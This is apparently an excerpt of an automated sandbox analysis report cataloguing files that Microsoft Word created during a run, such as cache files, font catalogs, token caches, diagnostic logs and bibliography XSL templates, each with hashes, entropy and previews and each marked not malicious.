                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636872" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4761 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                        Category:dropped
                                        Size (bytes):4761
                                        Entropy (8bit):7.945585251880973
                                        Encrypted:false
                                        SSDEEP:96:6ZUpZsm0HwZ8FLSeXs+aiL9qcZ7KtlAD1GlNHgdkVI5F11AcNmwkVFzGz6ENhZC7:62T0QOLl8vAqcZ7K3AUNAdx5FAx9VEOj
                                        MD5:77B20B5CD41BC6BB475CCA3F91AE6E3C
                                        SHA1:9E98ACE72BD2AB931341427A856EF4CEA6FAF806
                                        SHA-256:5511A9B9F9144ED7BDE4CCB074733B7C564D918D2A8B10D391AFC6BE5B3B1509
                                        SHA-512:3537DA5E7F3ABA3DAFE6A86E9511ABA20B7A3D34F30AEA6CC11FEEF7768BD63C0C85679C49E99C3291BD1B552DED2C6973B6C2F7F6D731BCFACECAB218E72FD4
                                        Malicious:false
                                        Preview:MSCF............,...................O..................YWP .disallowedcert.stl.lJ..B...CK.wTS.....{.&Uz.I."E".HS@. .P.!.....*E. .DQ..... EDA.H. E..""/.s<.s.9.....&#.{~k.VV..7@......b.R....MdT..B.L..%.C......" ....%.4%..%*.B..T.d...S.....pem..$....&.q.`.+...E..C.....$.|.A.!~d.H>w%S$...QC't..;..<..R@....2. .l..?..c..A....Ew...l..K$.. ~...'......Mt^c..s.Y%..}......h......m....h.......~d...,...=ge3.....2%..(...T..!].....!C~.X..MHU.o[.z].Y...&lXG;uW.:...2!..][\/.G..]6#.I...S..#F.X.k.j.....)Nc.].t^.-l.Y...4?.b...rY....A......7.D.H\.R...s.L,.6.*|.....VQ....<.*.......... [Z....].N0LU.X........6..C\....F.....KbZ..^=.@.B..MyH...%.2.>...]..E.....sZ.f..3z.].Y.t.d$.....P...,. .~..mNZ[PL.<....d..+...l.-...b.^....6F..z.&.;D.._..c."...d..... k9....60?&..Y.v.dgu...{.....{..d=..$......@^..qA..*uJ..@W.V..eC..AV.e+21...N.{.]..]..f]..`Z.....]2.....x..f..K...t. ...e.V.U.$PV..@6W\_nsm.n.........A<.......d....@f..Z... >R..k.....8..Y....E>..2o7..........c..K7n....

                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):340
                                        Entropy (8bit):3.129937848515287
                                        Encrypted:false
                                        SSDEEP:6:kKE+h5+7DYUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:c+rLkPlE99SCQl2DUeXJlOA
                                        MD5:3A22E1C6062AF05737F413B0B5C8CE6E
                                        SHA1:4860236C13A198EFDE44D76113A623339E1001CD
                                        SHA-256:36CF97D18386BB3B02D9F4A523AACDFE9C9BEB9FBE3EB624A095301C0E578BD9
                                        SHA-512:8E6F645327AF0EBE457FF4BE67DA1B48E6DD757CD28685374BF8F40FEEA0A5E6FD9F5BB5DBBDEE95127AF743412B3EFC3EDD26816C259AD22350E17D5AFF2DD1
                                        Malicious:false
                                        Preview:p...... ........../.aQ..(....................................................... ........~..MG......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...

                                        C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):521377
                                        Entropy (8bit):4.9084889265453135
                                        Encrypted:false
                                        SSDEEP:3072:gdTb5Sb3F2FqSrfZm+CnQsbzxZO7aYb6f5780K2:wb5q3umBnzT
                                        MD5:C37972CBD8748E2CA6DA205839B16444
                                        SHA1:9834B46ACF560146DD7EE9086DB6019FBAC13B4E
                                        SHA-256:D4CFBB0E8B9D3E36ECE921B9B51BD37EF1D3195A9CFA1C4586AEA200EB3434A7
                                        SHA-512:02B4D134F84122B6EE9A304D79745A003E71803C354FB01BAF986BD15E3BA57BA5EF167CC444ED67B9BA5964FF5922C50E2E92A8A09862059852ECD9CEF1A900
                                        Malicious:false
                                        Preview:{"MajorVersion":4,"MinorVersion":40,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"ADLaM Display","fam":[],"sf":[{"c":[536870913,0],"dn":"ADLaM Display Regular","fs":140072,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"ADLaM Display"}],"gn":"ADLaM Display","id":"31965479471","p":[2,1,0,0,0,0,0,0,0,0],"sub":[],"t":"ttf","u":[2147491951,1107296330,0,0],"v":131072,"w":26215680}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":9830

                                        C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_40.ttf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_40RegularVersion 4.40;O365
                                        Category:dropped
                                        Size (bytes):773040
                                        Entropy (8bit):6.55939673749297
                                        Encrypted:false
                                        SSDEEP:12288:Zn84XULLDs51UJQSOf9VvLXHyheIQ47gEFGHtAgk3+/cLQ/zhm1kjFKy6Nyjbqq+:N8XPDs5+ivOXgo1kYvyz2
                                        MD5:4296A064B917926682E7EED650D4A745
                                        SHA1:3953A6AA9100F652A6CA533C2E05895E52343718
                                        SHA-256:E04E41C74D6C78213BA1588BACEE64B42C0EDECE85224C474A714F39960D8083
                                        SHA-512:A25388DDCE58D9F06716C0F0BDF2AEFA7F68EBCA7171077533AF4A9BE99A08E3DCD8DFE1A278B7AA5DE65DA9F32501B4B0B0ECAB51F9AF0F12A3A8A75363FF2C
                                        Malicious:false
                                        Preview:........... OS/29....(...`cmap.s.,.......pglyf..&....|....head2..........6hheaE.@v.......$hmtx...........@loca.U.....8...Dmaxp........... name.P+........post...<...... .........b~1_.<...........<......r......Aa...................Q....Aa....Aa.........................~...................................................3..............................MS .@.......(...Q................. ...........d...........0...J.......8.......>..........+a..#...,................................................/...K.......z...............N......*...!...-...+........z.......h..%^..3...&j..+...+%..'R..+..."....................k......$A...,.......g...&...=.......X..&........*......&....B..(B...............#.......j...............+...P...5...@...)..........#...)Q...............*...{.. ....?..'...#....N...7......<...;>.............. ]...........5......#....s.......$.......$.......^..................+...>....H.......%...7.......6.......O...V...........K......"........c...N......!...............$...&...*p..

                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):2278
                                        Entropy (8bit):3.8423138297543904
                                        Encrypted:false
                                        SSDEEP:48:uiTrlKxsxxAxl9Il8uSHOtdNJ/zvv/GWCe75gid1rc:vsYAOFJDv/GNedM
                                        MD5:7893C271729148EE28A8F23ABD20C1D7
                                        SHA1:A4A2A9227551037010A3933561F76F46E050AA11
                                        SHA-256:28A7B095896F452074F1F9DDD1BC63FC65302ED5CF4565924637FF824849C787
                                        SHA-512:9BACBEDDAFDAC0A572F5847EFFFF8205E2174393B9D762EB11F2FE04CAF3853F26C4F02588C420F4E78856ACF4A99E9D9D7A9BB8AF9885A9B267E0E83B0B1663
                                        Malicious:false
                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.H.I.8.H.2.p.R.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.R.x.0.e.n.j.

                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):2684
                                        Entropy (8bit):3.914546331518931
                                        Encrypted:false
                                        SSDEEP:48:uiTrlKxJx/xl9Il8uCt0nevT+NJYZZ3OGOUzJ6n89oZzd/vc:mYgt0BYeyY89oZu
                                        MD5:B9CEB7AD3EFB6272DCF495CA26BFC159
                                        SHA1:82039C3C96742D771D46CF352127DAD9B8DAB3B3
                                        SHA-256:FF53AFCEEBB3E27A4306D166670A4B60F46B277B5CC174FFF64631ED101833AF
                                        SHA-512:71686BF6243CC1FD11F7843106FECF79DFB16359A2B16C636F09C3238BDDDA6508B9338761E7ED6D62964C5FF2DC07D7015383757F42460D8A724C5A258E011F
                                        Malicious:false
                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.H.X.L.G.R.5.H.j.D.k.3.C.i.F.b.L.a.m.K.N.+.n.c.g.T.0.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.Y.X.k.N.j.N.w.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.R.x.0.e.n.j.

                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):4542
                                        Entropy (8bit):4.004544025631226
                                        Encrypted:false
                                        SSDEEP:48:uiTrlKxxx0xD9Il8u96tztLsTi/MBo5S9t8ZJz1h2NYAUcPIHmxBxaVid+6AnxUs:3Y76hps2E65CIJB6YA4Hu7dFAO5fUyFu
                                        MD5:967D5208C05D04C5FEE8489AEB865472
                                        SHA1:44605DF49C8AAB64BEE9BC8BE9EF865CE6464C94
                                        SHA-256:73F70A29BE9314ACABCE67F36228675C7DDAB8179D84B2CFCD5CB5EC746606E4
                                        SHA-512:632348DE37922B18CFEC582772D8C58EE945C83A696D864EE0B55C95D70711ABABAA38DC6F1700ADC4F59F68637E2C680365CA03BA4C006CC6A111999B3CFD3C
                                        Malicious:false
                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".n.F.E.2.B.W.J.R.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.R.x.0.e.n.j.

                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{F7BFE473-6C9B-43EF-9F97-6D0831E89534}.tmp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):2526
                                        Entropy (8bit):3.6977608285692836
                                        Encrypted:false
                                        SSDEEP:24:445nc9A02WMCtb4IkcRwdt/SCUAot4In3c6FM5jKBuqt0ZLsh:xncOAMCV1hRwrUAoKKcFjKMflsh
                                        MD5:1E527F3E2EF2470E65E7262406A65AD6
                                        SHA1:62548154DFD2BC146BB4B7044908E93CE1423148
                                        SHA-256:3C17D57C77CAF6FD4DB9307F36E7BA7B7F02990EE5E39351EF4BDB2386A35317
                                        SHA-512:57C2ACC65D11EE74F587D4D5C0F9C3C802B0944F4BADD4E69E78196A248F6347F56154BD95AE3D1FE0C85A3172093198298067A8297E01B130FB8A274321807F
                                        Malicious:false
                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1734535812307364800_688B8AE6-E969-4F29-8173-3E974F88B889.log

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:ASCII text, with very long lines (1351), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):20971520
                                        Entropy (8bit):0.015390051244227574
                                        Encrypted:false
                                        SSDEEP:1536:1UTK03SQFgwFXJjAVWrxbhEpY7o/YvwpEGZ81zB:qfg2
                                        MD5:57DCAA089299EA0A048A68D803504353
                                        SHA1:C28B82718010D0BE0C992E6592EA4C0D9371BCAA
                                        SHA-256:C6D0778198B8696C7B01DEB7659ABB94C4BE708CF13F79D86BC23D3C82B5BA5F
                                        SHA-512:B795963427535F35B08DC8AA661496E9A0C31F9398163CCD451BC71641FCA51936DD0FD4C0999DA0D254E314548CCD4EACCF87B7C362F47967FC4BEC3600DAEA
                                        Malicious:false
                                        Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/18/2024 15:30:12.586.WINWORD (0x1DE8).0x1E5C.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":22,"Time":"2024-12-18T15:30:12.586Z","Contract":"Office.System.Activity","Activity.CV":"5oqLaGnpKU+Bcz6XT4i4iQ.7.1","Activity.Duration":398,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...12/18/2024 15:30:12.586.WINWORD (0x1DE8).0x1E5C.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":23,"Time":"2024-12-18T15:30:12.586Z","Contract":"Office.System.Activity","Activity.CV":"5oqLaGnpKU+Bcz6XT4i4iQ.7","Activity.Duration":2863,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.FailureD

                                        C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1734535812308110100_688B8AE6-E969-4F29-8173-3E974F88B889.log

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):20971520
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                        SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                        SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                        SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                        Malicious:false
                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\TCD8846.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):302
                                        Entropy (8bit):3.537169234443227
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXfQIUA/e/Wl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXZ/eulNGHmD0wbnKYZAH/lMZqiv
                                        MD5:9C00979164E78E3B890E56BE2DF00666
                                        SHA1:1FA3C439D214C34168ADF0FBA5184477084A0E51
                                        SHA-256:21CCB63A82F1E6ACD6BAB6875ABBB37001721675455C746B17529EE793382C7B
                                        SHA-512:54AC8732C2744B60DA744E54D74A2664658E4257A136ABE886FF21585E8322E028D8243579D131EF4E9A0ABDDA70B4540A051C8B8B60D65C3EC0888FD691B9A7
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0.n.m.e.r.i.c.a.l...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                        C:\Users\user\AppData\Local\Temp\TCD8846.tmp\iso690nmerical.xsl

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):217137
                                        Entropy (8bit):5.068335381017074
                                        Encrypted:false
                                        SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                        MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                        SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                        SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                        SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame

                                        C:\Users\user\AppData\Local\Temp\TCD8847.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):314
                                        Entropy (8bit):3.5230842510951934
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXJuJaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyZuUw9eNGHmD0wbnKYZAH/lMZqiv
                                        MD5:F25AC64EC63FA98D9E37782E2E49D6E6
                                        SHA1:97DD9CFA4A22F5B87F2B53EFA37332A9EF218204
                                        SHA-256:834046A829D1EA836131B470884905856DBF2C3C136C98ADEEFA0F206F38F8AB
                                        SHA-512:A0387239CDE98BCDE1668B582B046619C3B3505F9440343DAD22B1B7B9E05F3B74F2AE29E591EC37B6570A0C0E5FE571442873594B0684DDCCB4F6A1B5E10B1F
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.e.e.e.2.0.0.6.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                        C:\Users\user\AppData\Local\Temp\TCD8847.tmp\ieee2006officeonline.xsl

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):294178
                                        Entropy (8bit):4.977758311135714
                                        Encrypted:false
                                        SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                        MD5:0C9731C90DD24ED5CA6AE283741078D0
                                        SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                        SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                        SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL

                                        C:\Users\user\AppData\Local\Temp\TCD8857.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):254
                                        Entropy (8bit):3.4721586910685547
                                        Encrypted:false
                                        SSDEEP:6:fxnxUX9+RclTloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyteUTloGHmD0+dAH/luWvv
                                        MD5:4DD225E2A305B50AF39084CE568B8110
                                        SHA1:C85173D49FC1522121AA2B0B2E98ADF4BB95B897
                                        SHA-256:6F00DD73F169C73D425CB9895DAC12387E21C6E4C9C7DDCFB03AC32552E577F4
                                        SHA-512:0493AB431004191381FF84AD7CC46BD09A1E0FEEC16B3183089AA8C20CC7E491FAE86FE0668A9AC677F435A203E494F5E6E9E4A0571962F6021D6156B288B28A
                                        Malicious:false
